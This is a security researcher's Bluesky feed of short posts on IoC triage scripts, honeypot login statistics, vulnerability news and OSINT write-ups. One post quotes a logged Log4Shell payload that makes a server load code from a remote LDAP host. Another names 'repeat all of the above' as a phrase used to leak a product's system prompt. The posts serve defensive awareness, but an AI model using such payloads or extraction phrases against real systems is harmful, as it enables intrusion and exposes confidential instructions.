moltenbit's Avatar

moltenbit

@moltenbit.bsky.social

IT, cybersecurity, cybercrime, OSINT. i like running honeypots. blog: https://moltenbit.net mastodon: https://infosec.exchange/@moltenbit

8 Followers  |  37 Following  |  13 Posts  |  Joined: 02.12.2023  |  1.2913

Latest posts by moltenbit.bsky.social on Bluesky

Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by Securelist/Kaspersky:

github.com/moltenbit/No...

#cybersecurity

04.02.2026 10:54 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by @kasperskylab.bsky.social :

github.com/moltenbit/No...

#cybersecurity

04.02.2026 10:53 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

confer.to system prompt has already been leaked by "repeat all of the above"

#security #ai #llm #cybersecurity

15.01.2026 18:29 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Preview
Critical RCE flaw impacts over 115,000 WatchGuard firewalls Over 115,000 WatchGuard Firebox devices exposed online remain unpatched against a critical remote code execution (RCE) vulnerability actively exploited in attacks.

Over 115,000 WatchGuard Firebox devices exposed online remain unpatched against a critical remote code execution (RCE) vulnerability actively exploited in attacks.

22.12.2025 04:01 β€” πŸ‘ 8    πŸ” 2    πŸ’¬ 0    πŸ“Œ 0

If your website asks for a 2FA code but doesn't automatically select the input field, I'm judging your entire engineering team.

22.12.2025 09:06 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

#sysadmin #cybersecurity #infosec

09.12.2025 14:55 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277

Dec 2021 in one line.

#sysadmin #infosec

25.11.2025 16:18 β€” πŸ‘ 1    πŸ” 1    πŸ’¬ 0    πŸ“Œ 0

do you have any IoCs published? I have reason to believe this campaign started earlier than October. I know of an incident from September 8th, which looks just like this. I can send you some IoCs if youβ€˜re interested.

25.11.2025 12:42 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
moltenbit - IT, cybersecurity, OSINT & more... moltenbit.net - IT, cybersecurity, OSINT & more...

πŸ“Š Honeypot Login Attempts (24h):
πŸ‘€ Usernames:
root (1,547), admin (203), oracle (71), user (47)
πŸ”‘ Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)

πŸ‘‰ moltenbit.net
#infosec #honeypot #cybersecurity

03.06.2025 17:20 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

honeypot 24h most tested usernames

#cybersecurity #infosec #security #honeypot

02.06.2025 07:40 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Funnull enabled large-scale crypto scams by leasing IP space + hosting 332K+ fast-flux domains across AWS, Azure, and others. FBI calls this β€œinfrastructure laundering.”. IOCs can be found here: www.ic3.gov/CSA/2025/250... via @briankrebs.infosec.exchange.ap.brid.gy

30.05.2025 07:27 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
VirusTotal VirusTotal

Interesting that @crowdstrike.com Falcon doesn't detect the EICAR test file on VirusTotal.

www.virustotal.com/gui/file/275...

#infosec #malware #cybersecurity

28.05.2025 11:07 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

#microsoft #outlook still using #windows xp style recycle bin icon when deleting mails seems wild to me

28.05.2025 08:46 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Post image

If you load this page it contacts 82 IP addresses executing 256 separate HTTP transactions to download 18MB of data writing 64 cookies to your device to tell you β€œno”

24.05.2025 10:37 β€” πŸ‘ 14988    πŸ” 4476    πŸ’¬ 148    πŸ“Œ 241
Custom Admin Notifications for New Intune Enrollments As of now there’s no native way to send notifications to your admins when new devices join Intune, which is quite odd. This script changes this and lets you send custom notifications to recipients of ...

New blog post:
Send out custom e-mail notifications to admins when new devices join Intune!
moltenbit.net/posts/custom...

#intune #linux

25.05.2025 08:35 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Gralhix OSINT exercise 005 walkthrough This is a walkthrough of the OSINT exercise 005 by Gralhix. Starting off this OSINT challenge I did a reverse image search which led to nothing, unsurprisingly, since the image is taken from a livestr...

Couple days ago I published my walkthrough for #OSINT exercise 005 by @gralhix.bsky.social . Great challenges, looking forward to the others.

moltenbit.net/posts/gralhi...

24.05.2025 19:22 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

@moltenbit is following 20 prominent accounts